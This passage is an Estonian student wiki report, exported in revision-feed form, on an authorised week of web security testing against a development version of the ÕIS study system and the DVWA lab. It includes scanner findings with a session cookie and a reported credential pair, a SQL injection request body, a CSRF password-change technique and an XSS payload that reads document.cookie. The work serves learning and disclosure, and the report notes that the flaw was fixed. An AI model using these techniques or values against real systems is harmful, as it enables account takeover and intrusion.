Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|250px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Burp suite===&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Nessuse algkäivitamine===&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Backtrack: w3af ===&lt;br /&gt;
[[File:Basic HTTP Auth.png|250px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|250px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|250px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Skänneerimine &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Soovitus ===&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult näiteks: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlesime selle kuulajaskonnale.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
Video (meie esitlus on alates 11:20&#039;st):&lt;br /&gt;
&lt;br /&gt;
http://echo360.e-uni.ee/ess/echo/presentation/da8c32af-52d0-4a02-85fa-24f9323f8ce9&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Alo:&amp;lt;/b&amp;gt; Intensiivõppe nädal oli väga huvitav kogemus, nädalaga sai õpitud palju uut ja huvitavat. Meeskonnatöö sujus hästi ja nädala algul püsitatud eesmärgid said täidetud. Isiklikult soovitan intensiivõppe nädalal osaleda kõigil kellel vähegi võimalik.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Sander:&amp;lt;/b&amp;gt; Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Urmo:&amp;lt;/b&amp;gt; Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Taavi:&amp;lt;/b&amp;gt;Intensiivõppenädal on väga hea võimalus lühikese ajaperioodiga omandada väga palju uusi ja huvitavaid teadmisi ning oskusi.Kindlasti soovitan kõigile intensiivõppenädalal osalemist.Ärge olge heidutatud ka inimesed kes arvavad, et neil on vähe või puudulikud oskused või teadmised, intensiivõppenädalal ei ole eeldatud, et te juba oskate asju vaid see nädal ongi õppimiseks. Tore kogemus ja kõik järgmine aasta osalema.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Matis:&amp;lt;/b&amp;gt; Olin veel viimase hetkeni täiesti kahe vahel, et kas minna intensiivõppe nädalale või mitte. Siiski otsustasin minna ja olen väga väga rahul, et sedasi otsustasin. Sain väga palju uusi teadmisi erinevate testprogrammide ja -keskkondade kasutamise kohta. Hea kogemus ka tiimiga töötada, ülesandeid jagada ja üldisel koostööl. Soovitan kindlasti ka teistel tudengitel osaleda intensiivõppe nädalal. Väga hea võimalus reaalseid ülesandeid ja probleeme, mis võivad tulevikus ette tulla, läbi teha.&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
 http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
 http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
 http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
 http://sectools.org/tag/web-scanners/&lt;br /&gt;
 http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
 http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
:Alo Konno A21&lt;br /&gt;
:Urmo Lihten A21&lt;br /&gt;
:Taavi Podžuks A22&lt;br /&gt;
:Matis Alliksoo A22&lt;br /&gt;
:Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Täname oma juhendajaid:&lt;br /&gt;
:Mart Mangus&lt;br /&gt;
:Margus Ernits&lt;br /&gt;
:Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47051</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47051"/>
		<updated>2012-03-30T13:48:37Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Valmimisel!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
